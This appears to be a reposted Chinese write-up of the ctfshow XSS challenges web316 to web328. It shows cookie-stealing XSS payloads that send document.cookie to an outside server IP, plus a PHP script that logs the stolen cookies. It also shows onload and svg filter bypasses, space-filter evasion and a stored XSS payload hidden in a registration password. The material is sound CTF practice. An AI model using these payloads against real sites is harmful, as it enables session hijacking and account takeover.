当前位置: 首页 > news >正文

ctfshow[ xss 篇]

web316

1.打开是一个这样的页面

可以写下祝福语,既然是xss题目,那么直接xss语句,看看能不能弹窗

<script>alert(1)</script>

发现可以,查看一下他的cookie

<script>alert(document.cookie)</script>

说我不是admin,没有flag

2.开始构造

方法1

可以通过服务器的方式进行外带

<script>location.href="ip"+document.cookie</script>

我这里使用的是python -m http.server 80,python的服务

<script>location.href="http://106.55.49.252/"+document.cookie</script>

然后到达服务器这里看响应

解码完得到flag

方法2

首先在服务器上写一个php文件

<?php $cookie = $_GET['cookie']; $time = date('Y-m-d h:i:s', time()); $log = fopen("cookie.txt", "a"); fwrite($log,$time.': '. $cookie . "\n"); fclose($log); ?>

然后访问这个php文件

<script>location.href="http://106.55.49.252/1.php?cookie="+document.cookie</script>

在传入这个,到服务器那里等15秒

3.知识点

这题使用的是一个外带的方法

location.href:获取或设置当前页面URL

题目中用到的

<script>location.href="http://106.55.49.252/"+document.cookie</script>

就相当于在管理员门口装了一个大镜子,当管理员admin,要拿钥匙开门的时候,把钥匙反射到我的屋里了

这个就是让admin的浏览器给服务器发送请求,顺便给我的服务器也发送了请求

web317

1.打开还是那个页面

这题过 滤了script,可以换一个属性

使用body属性

<body οnlοad="location.href='http://106.55.49.252/1.php?cookie'+document.cookie"></body>

然后到服务器查看

url解码得到flag

onload事件是页面加载完成触发

web318

1.上题的payload还能使用

还能使用svg属性

<svg οnlοad="location.href='http://106.55.49.252/1.php?cookie='+document.cookie"></svg>

web319

1.上题的payload还能使用

web320

1.这次上题的不行了

应该是多了过滤

一点一点的删除,看看是哪些过滤了

最后发现是空格被过滤了

绕过空格 ,有 / /**/ 绕过方式

考验对空格的绕过,可以使用 / /**/

一直到326题全部都是这个payload

web327

1.这题变成存储型了

有发件人,收件人 还有信的内容几个功能

那么根据前面题目的思路,这个收件人肯定是admin,然后信的内容就是xss的内容

2.开始构造

收件人admin,发件人任意,然后信的内容为下方的

<script>location.href="http://106.55.49.252/1.php?cookie="+document.cookie</script>

web328

1.打开变成了 登陆页面

登陆admin,弱口令发现不行,看到有个注册功能

不让注册admin

那就随便注册一个

登陆上去,发现用户管理,只有管理员可看,抓包看看,是如何验证身份的

发现是由cookie认证的,那么现在唯一能套取admin用户的cookie的地方,应该是由密码那里可以盗取

那么在注册的时候,将密码设置为盗取admin用户cookie的payload,然后再使用admin的来进行查看用户管理,那么不就成了

2.开始构造

任意注册一个用户,密码为盗取cookie的payload

这里需要加上分号因为前面那些题是纯HTML属性,所以不需要分号,现在这里是JS字符串内,必须加 分号,用来闭合前面的赋值语句并开启新语句

<script>location.href="http://106.55.49.252/1.php?cookie="+document.cookie;</script>

然后登陆完

给进行一个替换,这边就变成admin用户了

但是看不到管理页面,而且这是临时的,我们直接到存储里面修改 cookie,然后刷新一下就能看到flag了

http://www.jsqmd.com/news/152999/

相关文章:

  • 【AI模型管理必修课】:Open-AutoGLM优雅关闭的7种高阶策略
  • YOLO模型可以用于视频流检测吗?GPU并发能力决定上限
  • 终极解决方案:用ASCIIMathML轻松实现网页数学公式可视化
  • AGI:构建下一代GPU性能分析框架的技术实践
  • 5步掌握BMAD-METHOD多语言开发:从零到一的完整指南
  • macOS虚拟机性能优化终极指南:从卡顿到流畅的实战技巧
  • 软件I2C时序控制核心要点:一文说清
  • VMware检测绕过终极指南:虚拟机隐身完整教程
  • Open-AutoGLM技术内幕首次公开(仅限高级开发者阅读的5层抽象模型)
  • Vue.Draggable拖拽排序终极指南:从新手到专家的完整实践路径
  • AWS Amplify分布式追踪:3步实现X-Ray全链路监控的终极指南
  • ChatTTS语音生成系统完整指南
  • 从零到精通:离散时间信号处理学习全攻略
  • YOLO目标检测精度提升技巧:多卡GPU训练策略分享
  • 如何快速使用Playground:前端代码演示工具完整指南
  • 技术面试突破指南:10个让你脱颖而出的实战技巧
  • 终极指南:使用bilidown轻松下载B站高清视频
  • Open-AutoGLM部署踩坑实录:90%新手都会忽略的6个关键细节
  • Keil5添加文件后无法编译?C语言解决方案
  • YOLO目标检测项目落地全流程:从本地开发到GPU云部署
  • RemoveAdblockThing终极指南:深度解析YouTube广告拦截检测绕过技术
  • 打造惊艳幻灯片:xaringan助你成为R语言演示大师
  • 零基础入门:STLink接口引脚图连接STM32步骤
  • Open-AutoGLM源代码逆向工程(从零读懂国产大模型调度系统的秘密)
  • Xcode AI插件开发实战:从零构建智能编程助手
  • 终极B站视频下载完整指南:从8K超清到批量处理
  • 15_以为 Coze 是来解放双手的,结果我在此“低代码”平台手搓了 200 行 Python
  • PHP时间助手终极指南:中国节假日判断完整教程
  • 蛋白质构象重建:AlphaFold如何解决侧链原子空间定位难题
  • MIL-HDBK-217F-Notice2.pdf 资源文件介绍